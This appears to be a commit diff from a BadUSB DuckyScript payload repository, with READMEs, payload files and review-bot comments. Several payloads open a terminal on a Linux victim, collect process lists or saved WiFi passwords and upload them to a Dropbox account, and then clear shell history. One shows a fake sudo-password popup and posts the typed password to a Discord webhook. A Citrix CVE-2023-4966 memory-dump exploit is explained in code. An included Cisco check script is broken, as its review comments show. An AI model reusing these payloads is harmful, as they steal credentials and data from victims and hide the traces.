<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the process info on a Linux machine.
Opens a shell, get the process info, set the Discord webhook configuration, send it to the discord webhook, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook
### Settings
* Set the Discord Webhook configuration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
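Review bot: the README and the payload disagree on the exfiltration channel: the Description says `set the Discord webhook configuration, send it to the discord webhook` and Dependencies lists `* Discord Webhook`, but the payload defines `TOKEN`, `DROPBOX_FOLDER_NAME` and `DROPBOX_API_CONST` and uploads `process.txt` to Dropbox, while its own REM `Requirements` block still says `Discord Webhook`. Update the README and the REM header to say Dropbox access token, or change the payload back to the webhook the docs describe.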
@@ -0,0 +1,73 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### GET PROCESS SECTION ####
STRING ps aux > process.txt
ENTER
DELAY 500
REM #### EXFILTRATE SECTION ####
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
DELAY 500
STRING TXT_PATH="/home/$USER_NAME/process.txt"
ENTER
DELAY 500
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
STRING DROPBOX_FOLDER_NAME
STRING "
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
ENTER
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
REM #### REMOVE TRACES ####
STRING history -c
ENTER
DELAY 500
STRING exit
ENTER
@@ -0,0 +1,52 @@
# Exfiltrate Sudo Password By Phishing - Linux ✅
A script used to change exfiltrate the sudo password by a popup phishing based on linux systems.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to change exfiltrate the sudo password by a popup phishing based on linux systems.
Opens a shell, get the password by a popup, send the input to a Discord webhook.
## Getting Started
### Dependencies
* Internet Connection
### Settings
* Set the Discord webhook
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
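Review bot: `A script used to change exfiltrate the sudo password` (tagline and first Description line) carries a leftover `change` from a copy-paste; it should read `A script used to exfiltrate the sudo password through a phishing popup on Linux systems`. The category is `Execution` here but `Credentials, Phishing` in the payload header; use the latter, as the email-phishing README does. Dependencies should list `kdialog`, which draws the popup, next to the internet connection.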
@@ -0,0 +1,31 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Sudo Password By Phishing |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Phishing |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Internet Connection
REM - Discord webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### POPUP SECTION ####
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
STRING WEBHOOK_URL="example.com"
ENTER
DELAY 500
REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --inputbox "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit;
ENTER
@@ -0,0 +1,55 @@
# Exfiltrate WiFi Passwords - Linux ✅
A script used to exfiltrate the wifi passwords on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltrate, Credentials, Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the wifi passwords on a Linux machine.
Opens a shell, get the WiFi names, get the passwords using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
* Permissions
### Settings
* Set the Dropbox token
* Set the sudo password
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
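Review bot: Dependencies says `* Permissions` and Settings says `Set the sudo password` without saying what they mean; state that root is required (the payload runs `sudo su`) and that `nmcli` and `zip` must be present. The category spelling `Exfiltrate` again differs from the payload header's `Exfiltration`; align them.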
@@ -0,0 +1,116 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Wifi Passwords - Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Credentials, Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PREREQUISITES SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
STRING sudo su
ENTER
DELAY 1000
STRING sudo_password
ENTER
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
STRING ACCESS_TOKEN="example.com"
ENTER
REM #### ZIP SECTION ####
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX)
ENTER
DELAY 500
STRING ZIP_PATH="/home/$ZIP_NAME"
ENTER
REM #### WiFi && ZIP SECTION ####
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
DELAY 500
STRING nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
ENTER
DELAY 500
STRING nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
ENTER
DELAY 500
STRING done
ENTER
DELAY 500
REM Wifi exfiltration command time - It depends
DELAY 1000
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
REM Zip operation time - It depends
DELAY 3000
REM #### EXFILTRATE SECTION ####
REM Set yout Dropbox folder name
STRING DROPBOX_FOLDER="/example"
ENTER
DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING exit
ENTER
@@ -0,0 +1,6 @@
#!/bin/bash
for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
done
@@ -0,0 +1,142 @@
# Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273
Use this script to set up an automated integrity verification system for your Cisco IOS XE machine in relation to the attack that could create a backdoor on Cisco IOS XE systems vulnerable to CVE-2023-20198 and CVE-2023-20273.
**Category**: incident-response
![](/assets/1.png)
## Index
- [Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](#auto-check-cisco-ios-xe-backdoor-based-on-cve-2023-20198-and-cve-2023-20273)
- [Payload Description](#payload-description)
- [Settings](#settings)
- [Regex](#regex)
- [Conseguence](#conseguence)
- [Administrator Permissions](#administrator-permissions)
- [Sources](#sources)
- [Credits](#credits)
## Payload Description
This script can be used to set up a Shell script that allows users of Cisco IOS XE-based systems to periodically check for potential attacks using the recent 0-day vulnerabilities CVE-2023-20198 and CVE-2023-20273.
As of now, patches for these vulnerabilities have not been developed or made available to users. According to analyses conducted by the Fox-IT[[4](#sources)] and VulnCheck[[5](#sources)] teams, it appears that several tens of thousands of devices have already been attacked using these two vulnerabilities.
*Note: Patches for these issues were released over the weekend and are now available to customers via the Cisco software download. [[3](#sources)]*
The severity of these attacks has increased significantly in recent times as cybercriminals have improved their malware's ability to camouflage within the system. Consequently, detecting intrusions has become more challenging.
In response to this, Cisco has released a basic method for users to assess their system's integrity. This involves running a curl command with specific parameters from a Shell on which the Cisco IOS XE system is installed. If the response includes a hexadecimal string (e.g., 0123456789abcdef01), it implies that the machine may have been compromised through the mentioned vulnerabilities.
An immediate solution to the problem is to reboot the system, which would close the backdoor. However, this doesn't mitigate the vulnerabilities in the long term, as the machine remains just as susceptible after the reboot and also why the attacker's super user is not removed. This means that rebooting the system is an immediate measure to block the threat but doesn't provide a lasting mitigation of the threat.
The payload.txt file contains DuckyScript code that enables you to create a Shell script that periodically performs the Cisco-suggested verification to determine if the machine has been attacked. The script defines three variables: the script name, the superuser (sudo) password, and the file path. The only variable that must be modified is the sudo password because it varies from user to user. The other two variables can be changed but aren't strictly necessary for the payload's functionality. They represent the desired script name and the default path (the current folder).
To minimize downtime, the Hak5 Detect Ready extension has been used. When the Shell is opened, the payload executes a series of commands that involve writing the contents of a file, allowing the creation of a script on the machine that will be automatically executed by the operating system.
Once the file is created, it's automatically saved at the end of the execution, and the payload proceeds to enable execution permissions using the permissions granted by the sudo+chmod command.
---
To maintain code readability, I chose to keep a less efficient but more straightforward version as follows:
```
REM Old script
REM STRINGLN sudo chmod +x #SCRIPT-NAME
REM DELAY 500
REM STRINGLN #SUDO-PSWD
REM DELAY 3000
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
REM STRINGLN exit
```
This coding style is not optimized since the `DELAY 3000` can vary significantly from one machine to another, making it inherently imprecise.
In order to optimize this code, I prefer the following version, which eliminates the previous waiting and includes only a short delay before entering the sudo password:
```
REM Optimized script
REM Set the script name replacing #SCRIPT-NAME, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
REM Here you chould define the script path replacing #PATH-TO-SCRIPT, if you don't change it is selected the default path, so the home path. If, for istance, you have a specific path where you put some stuff like this you can edit thi DuckyScript variable with the correct path
STRING sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
ENTER
DELAY 500
REM Here you must set your sudo password that permit to give the executable permissions to the file
STRING #SUDO-PSWD
ENTER
```
This command concatenates the assignment of execution permissions to the script and proceeds to set up the script for automatic execution every 5 minutes. The Shell is then closed after this operation.
As for the payload of the `curl` command, it has been copied and pasted from the official Cisco source [1].
## Settings
This payload is designed to operate without requiring the installation of third-party software and focuses on performing operations as quickly as possible, as time is a critical factor, as described in the [Consequences](#conseguence) section. The script operates in cycles, with one iteration every 300 seconds, but it is easily adaptable: simply modify the value `sleep 300 # wait time` in the `payload.txt` file to suit your preferences. However, it's important to note that completely removing this entry could generate a high volume of cURL requests, potentially causing issues.
It's crucial to keep in mind that system reboot doesn't fully resolve the problem. Even if the malware is removed, the high-privilege account created by attackers persists even after system reboot.
### Regex
The verification through the execution of the `curl` command involves examining the response of a POST request. If a hexadecimal string is detected within this response, it suggests that the machine may have been compromised using the vulnerabilities in question.
To ensure that the response indeed contains a hexadecimal string, you can use the regular expression (regex) `^[0-9a-zA-Z]+$`. This regex checks for the following criteria:
- `^` The string must start with...
- `[0-9A-Z-a-z]` ... a character that can be a digit from 0 to 9, an uppercase letter from A to Z, or a lowercase letter from a to z;
- `+` There must be at least one of the characters specified within the square brackets...
- `$` ... and the string must end with one of these characters.
Only if the response from the "curl" command contains characters other than hexadecimal ones or no characters at all, the regex will not find any matches, indicating that the machine under scrutiny has not been attacked up to that point.
### Conseguence
When an attack is detected, various actions can be taken. However, it's crucial to keep in mind that the more complex the programmed actions are, the longer the backdoor remains open.
It's important to note that the script, by default, has an approximately 5-minute check interval (300 seconds by default) during which no checks occur. Consequently, the accumulation of time required for various operations following the detection of an attack can increase the exposure time. Therefore, it's essential to carefully consider the actions to implement because adding complexity could negatively impact overall security.
In this scenario, sending a notification at the time of attack detection is suggested. You can customize the code to send an email or create a historical log file containing relevant information. However, it's essential to understand that the only way to definitively close the backdoor is by restarting the system. It's worth noting that a forced restart can carry risks, such as data loss or, in this specific case, the interruption of active connections. The decision to terminate a connection to close the backdoor or keep it open depends on the trade-off between security and operational continuity.
In conclusion, two key factors to consider are response times and the potential risk of data loss. As in any security analysis, the optimal solution depends on what you want to protect and the risks you are willing to accept.
### Administrator Permissions
Administrator privileges are not required to execute the script itself, but they are necessary to ensure that the file containing the script has the required permissions for execution. This type of permission granting is done using the command-line tool `chmod`, which is used to assign specific permissions to the script.
In this specific case, we are using the `-x` parameter, which signifies the execution permission for the script.
## Sources
- [1] Cisco comunication: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/
- [2] Red Hot Cyber post: https://www.redhotcyber.com/post/37-000-dispositivi-cisco-contengono-backdoor-attenzione-in-quanto-il-malware-ora-risulta-piu-difficile-da-rilevare/
- [3] Patch: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
- [4] Fox-IT comunication: https://twitter.com/foxit/status/1716472673876730149
- [5] VulnCheck comunication: https://twitter.com/VulnCheckAI/status/1716541908489543725
---
## Credits
<h2 align="center"> Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
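Review bot: the Regex section says the pattern verifies that the response is a hexadecimal string, but `^[0-9a-zA-Z]+$` matches any alphanumeric string; a hexadecimal check is `^[0-9a-fA-F]+$`. The bullet list below it also writes the class as `[0-9A-Z-a-z]`, which is not the pattern quoted above it. Since the script reboots on a match, the pattern and its description should agree, otherwise any single-token non-hex response counts as "attack detected". Two smaller documentation points: "Administrator Permissions" says the `-x` parameter is used, while the payload runs `chmod +x` (`-x` would remove the execute bit); and "Payload Description" says the Hak5 Detect Ready extension is used, but the payload.txt in this commit uses fixed `DELAY` values only. Finally, "Conseguence" (heading, index entry and the `#conseguence` anchor in Settings) should read "Consequences"; if the heading is renamed, the anchors must be updated together with it.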
Binary file not shown.
Width:  |  Height:  |  Size: 32 KiB
@@ -0,0 +1,114 @@
REM #############################################################################################
REM # #
REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Cisco IOS XE #
REM # #
REM #############################################################################################
DELAY 3000
CTRL-ALT t
DELAY 1000
STRING echo 'while true; do
ENTER
DELAY 500
STRING response=$(curl -k -H "Authorization: 0ff4fbf0ecffa77ce8d3852a29263e263838e9bb" -X POST https://systemip/webui/logoutconfirm.html?logon_hash=1)
ENTER
DELAY 500
STRING if [[ $response =~ ^[0-9a-zA-Z]+$ ]]; then
ENTER
DELAY 500
STRING if [ $? -eq 0]; then
ENTER
DELAY 500
STRING # Attack detected, here you decide what to do in this moment
ENTER
DELAY 500
STRING # 1. Send an email to sec-team
ENTER
DELAY 500
STRING # 2. Do some other ops
ENTER
DELAY 500
STRING # ...
ENTER
DELAY 500
STRING # 3. What do you want to do?
ENTER
DELAY 500
STRING # Can you reboot the system or you need to do something else before?
ENTER
DELAY 500
STRING # Do you want to close it?
ENTER
DELAY 500
STRING # ...
ENTER
DELAY 500
STRING # The only one way to close the backdoor is reboot the system, so don t change it (?)...
ENTER
DELAY 500
STRING # |-> See the Conseguence section in README
ENTER
DELAY 500
STRING reboot
ENTER
DELAY 500
STRING else
ENTER
DELAY 500
STRING # You are safe :-)
ENTER
DELAY 500
STRING fi
ENTER
DELAY 500
STRING fi
ENTER
DELAY 500
STRING sleep 300 # wait time
ENTER
DELAY 500
REM Set the script name replacing #SCRIPT-NAME, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
REM Here you chould define the script path replacing #PATH-TO-SCRIPT, if you don't change it is selected the default path, so the home path. If, for istance, you have a specific path where you put some stuff like this you can edit thi DuckyScript variable with the correct path
STRING done' > #PATH-TO-SCRIPT#SCRIPT-NAME
ENTER
DELAY 500
REM To avoid some bad DELAY I decided to use only one command row
REM Old script
REM STRINGLN sudo chmod +x #SCRIPT-NAME
REM DELAY 500
REM STRINGLN #SUDO-PSWD
REM DELAY 3000
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
REM STRINGLN exit
REM Optimized script
REM Set the script name replacing #SCRIPT-NAME, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
REM Here you chould define the script path replacing #PATH-TO-SCRIPT, if you don't change it is selected the default path, so the home path. If, for istance, you have a specific path where you put some stuff like this you can edit thi DuckyScript variable with the correct path
STRING sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
ENTER
DELAY 500
REM Here you must set your sudo password that permit to give the executable permissions to the file
STRING #SUDO-PSWD
ENTER
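Review bot: the launch line `sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit` will not run the check as the README describes. The generated script uses `[[ $response =~ ... ]]`, a bash construct, but it is started with `sh`, which on Debian/Ubuntu is dash and rejects `[[`; start it with `bash` (or give the file the `#!/bin/bash` line that auto-check.sh has and execute it directly). The trailing `$` is passed to the script as a literal argument, and because the loop is `while true` the foreground `sh` never returns, so the following `exit` is never reached; if the intent was to background the loop, that is `&`, and it then needs `nohup` or `setsid` to survive the `exit` that closes the terminal. More importantly, `reboot` restarts the Linux host on which the terminal was opened, not the IOS XE device that `curl` queried at `https://systemip/...`; closing the implant as the README describes requires rebooting the network device itself, and the unprivileged shell running the script is not the `sudo` that ran `chmod`, so even the local `reboot` may fail. Also `systemip` is a value the user must replace, but unlike `#SUDO-PSWD` it is neither written as a DuckyScript placeholder nor mentioned in the README, which states that the sudo password is the only variable that must change.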
@@ -0,0 +1,26 @@
#!/bin/bash
while true; do
response=$(curl -k -H "Authorization: 0ff4fbf0ecffa77ce8d3852a29263e263838e9bb" -X POST https://systemip/webui/logoutconfirm.html?logon_hash=1)
if [[ $response =~ ^[0-9a-zA-Z]+$ ]]; then
if [ $? -eq 0]; then
# Attack detected, here you decide what to do in this moment
# 1. Send an email to sec-team
# TODO
# 2. Do some other ops like save some log information somewhere or save before stop the process
# ...
# 3. What do you want to do?
# Can you reboot the system or you need to do something else before?
# Do you want to close it?
# ...
# The only one way to close the backdoor is reboot the system, so don t change it (?)...
# |-> See the Conseguence section in README
reboot
else
# You are safe :-)
fi
fi
sleep 300 # wait time
done
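Review bot: this script does not parse under bash, so the loop never starts. `if [ $? -eq 0]; then` is missing the space before `]` (`[` is a command and `]` must be a separate argument), and the `else` branch contains only a comment, which bash treats as an empty command list and rejects with "syntax error near unexpected token `fi'"; either drop the `else` or put a `:` in it. The inner `$?` test is also redundant: inside the `then` branch of `[[ $response =~ ... ]]` the last exit status is always 0. The same body is echoed into the file by payload.txt, so both copies need the fix. Separately, a connection failure leaves `response` empty, which does not match the pattern and is therefore reported as "safe" with nothing logged; an incident-response loop should distinguish "could not reach the device" (check curl's exit status, or use `--fail`) from "no implant found".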
@@ -0,0 +1,200 @@
# Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966
This payload sends an HTTP request to a remote server using the `curl` command. If the request succeeds, it means the exploit was successful. Conversely, if the request fails, it indicates that the target has resisted the attack.
This payload is a Proof of Concept (POC) based on DuckyScript and is intended for use only in authorized penetration testing. CVE-2023-4966 [[1](#sources)] has been resolved, and I have decided to release this payload only now to minimize the risk of it being used inappropriately. Please use this payload exclusively when you are fully aware of what you are doing and have obtained explicit authorization from the target.
**Category**: incident-response
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Index
- [Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](#exploit-citrix-netscaler-adc-and-gateway-through-cve-2023-4966)
- [CVE-2023-4966](#cve-2023-4966)
- [Summary](#summary)
- [Impacted Products](#impacted-products)
- [Settings](#settings)
- [DuckyScript Extensions Used](#duckyScript-extensions-used)
- [Payload Description Windows](#payload-description-windows)
- [Payload Description Linux](#payload-description-linux)
- [Script.sh](#script-sh)
- [Sources](#sources)
- [Credits](#credits)
## CVE-2023-4966
Multiple vulnerabilities have been discovered in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway).
### Summary
NetScaler ADC and NetScaler Gateway contain unauthenticated buffer-related vulnerabilities mentioned below
### Impacted Products
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
- NetScaler ADC and NetScaler Gateway14.1before14.1-8.50
- NetScaler ADC and NetScaler Gateway13.1before13.1-49.15
- NetScaler ADC and NetScaler Gateway13.0before 13.0-92.19
- NetScaler ADC 13.1-FIPS before 13.1-37.164
- NetScaler ADC 12.1-FIPS before 12.1-55.300
- NetScaler ADC 12.1-NDcPP before 12.1-55.300
***Note**: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and is vulnerable.*
This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.
![](./assets/1.png)
***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*
## Settings
The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address.
```DuckyScript
* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
```
## Payload Description Windows [_Go to the Windows version_](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)
In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header.
```powershell
$header_value = 'a' * 24576
```
Here, all newline characters ("\n") are removed from the string stored in `$header_value`. This is done to ensure that the string doesn't contain any line break characters.
```powershell
$header_value = $header_value -replace "\n", ""
```
A variable `$headers` is created, which holds an HTTP header formatted as a string. This header will be used in the subsequent HTTP request.
```powershell
$headers = "-H 'Host:$header_value'"
```
Here, a variable `$headers` is created as a hashtable containing the HTTP header. In this case, only the "Host" header is used, with the value from `$header_value`.
```powershell
$headers = @{ 'Host' = $header_value }
```
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
```powershell
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
```
Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.
```powershell
$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
```
This `if` statement checks if the first three characters of the HTTP response in the `$response` variable are equal to "200," indicating a successful HTTP response.
```powershell
if ($response.Substring(0, 3) -eq "200")
```
If the preceding condition is true, some messages are printed to indicate the beginning of the output.
```powershell
Write-Host "--- Dumped memory ---"
$response.Substring(131050)
Write-Host "--- End ---"
```
If the initial condition of the `if` statement is not met, a message is printed, indicating that the machine is not vulnerable.
```powershell
Write-Host "Could not dump memory"
```
## Payload Description Linux
This line sets the `header_value` variable to a string containing 24,576 'a' characters. It uses the `yes` command to repeatedly output 'a' and `head` to limit it to 24,576 lines. The `tr` command is used to remove any newline characters, resulting in a long string of 'a's.
```bash
header_value=$(yes a | head -n 24576 | tr -d '\n')
```
Here, the `headers` variable is constructed with the `-H` option for the cURL command. It sets the 'Host' header to the previously generated `header_value`.
```bash
headers="-H 'Host:$header_value'"
```
This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.
```bash
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
```
In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.
```bash
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
echo "$response" | cut -c 131051-
echo "The #HOSTNAME is vulnerable!"
echo "--- End ---"
else
echo "Could not dump memory"
fi
```
## Script sh
The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
Example Execution:
```shell
./script.sh 192.168.1.200
```
Before running the script, you might need to grant execute permissions to the file, as mentioned. You can do this with the following command:
```shell
sudo chmod +x script.sh
```
After assigning execute permissions, the above command allows the user to run the script without having to specify the sh command before the script's name.
## Sources
- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
## Credits
<h2 align="center"> Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
